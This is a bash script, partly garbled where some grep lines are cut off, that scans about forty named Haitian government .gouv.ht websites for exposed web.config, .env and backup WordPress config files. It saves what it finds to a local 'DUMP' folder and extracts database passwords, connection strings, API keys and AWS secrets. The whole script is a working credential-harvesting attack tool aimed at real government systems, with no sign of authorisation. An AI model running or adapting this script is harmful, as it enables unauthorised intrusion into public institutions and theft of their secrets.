#!/bin/bash # Haiti .gouv.ht web.config / sensitive file exposure scanner # Date: 2026-03-04 OUTDIR="C:/Users/Squir/Desktop/HAITI/DUMP/WEBCONFIG-SCAN" UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" DOMAINS=( primature.gouv.ht mae.gouv.ht mef.gouv.ht mjsp.gouv.ht menfp.gouv.ht mspp.gouv.ht agriculture.gouv.ht mci.gouv.ht mtptc.gouv.ht mpce.gouv.ht mast.gouv.ht mde.gouv.ht mcc.gouv.ht tourisme.gouv.ht mjsac.gouv.ht mcfdf.gouv.ht mhave.gouv.ht md.gouv.ht dgi.gouv.ht douane.gouv.ht oni.gouv.ht cscca.gouv.ht ulcc.gouv.ht ucref.gouv.ht cnmp.gouv.ht conatel.gouv.ht dinepa.gouv.ht ofatma.gouv.ht ofnac.gouv.ht communication.gouv.ht budget.gouv.ht bmpad.gouv.ht anarse.gouv.ht bme.gouv.ht igf.gouv.ht omrh.gouv.ht faes.gouv.ht infp.gouv.ht ute.gouv.ht deliveryunit.gouv.ht securitepublique.gouv.ht sigrh.gouv.ht ) PATHS=( "/web.config" "/wp-config.php.bak" "/.env" ) echo "=== Haiti .gouv.ht Sensitive File Exposure Scan ===" echo "=== Started: $(date) ===" echo "" for domain in "${DOMAINS[@]}"; do echo "----------------------------------------------" echo "[SCANNING] $domain" echo "----------------------------------------------" for path in "${PATHS[@]}"; do for proto in https http; do url="${proto}://${domain}${path}" outfile="${OUTDIR}/${domain}$(echo $path | tr '/' '-')" echo -n " [${proto}] ${path} ... " response=$(curl -sL \ --connect-timeout 10 \ --max-time 20 \ -H "User-Agent: ${UA}" \ -w "\n---HTTP_CODE:%{http_code}---" \ "${url}" 2>/dev/null) http_code=$(echo "$response" | grep -o 'HTTP_CODE:[0-9]*' | cut -d: -f2) body=$(echo "$response" | sed 's/---HTTP_CODE:[0-9]*---$//') if [ -z "$http_code" ]; then echo "TIMEOUT/UNREACHABLE" continue fi echo -n "HTTP $http_code " # Check for interesting content is_interesting=0 # web.config checks if echo "$body" | grep -qi "connectionString\| "${outfile}" echo " --> SAVED: ${outfile}" # Extract credentials echo " [CREDS FOUND]:" # Connection strings echo "$body" | grep -oi 'server=[^;]*\|data source=[^;]*\|database=[^;]*\|initial catalog=[^;]*\|uid=[^;]*\|user id=[^;]*\|pwd=[^;]*\|password=[^;]*' | while read line; do echo " $line" done # WP/ENV style echo "$body" | grep -i 'DB_NAME\|DB_USER\|DB_PASSWORD\|DB_HOST\|APP_KEY\|API_KEY\|MAIL_PASSWORD\|AWS_SECRET' | head -20 | while read line; do echo " $line" done # If we got a hit on HTTPS, skip HTTP for this path if [ "$proto" = "https" ]; then break fi else # Check if it's just an error page or redirect bodylen=${#body} if [ "$http_code" = "200" ] && [ "$bodylen" -gt 100 ]; then # Check if it might be HTML error page if echo "$body" | head -5 | grep -qi " "${outfile}.review" echo " --> Saved for review: ${outfile}.review" fi fi elif [ "$http_code" = "403" ]; then echo "FORBIDDEN" elif [ "$http_code" = "404" ]; then echo "NOT FOUND" elif [ "$http_code" = "301" ] || [ "$http_code" = "302" ]; then echo "REDIRECT" elif [ "$http_code" = "500" ]; then echo "SERVER ERROR" else echo "(${bodylen} bytes)" fi # If HTTPS worked (even 404/403), skip HTTP if [ "$proto" = "https" ] && [ -n "$http_code" ]; then break fi fi done done echo "" done echo "=== Scan Complete: $(date) ==="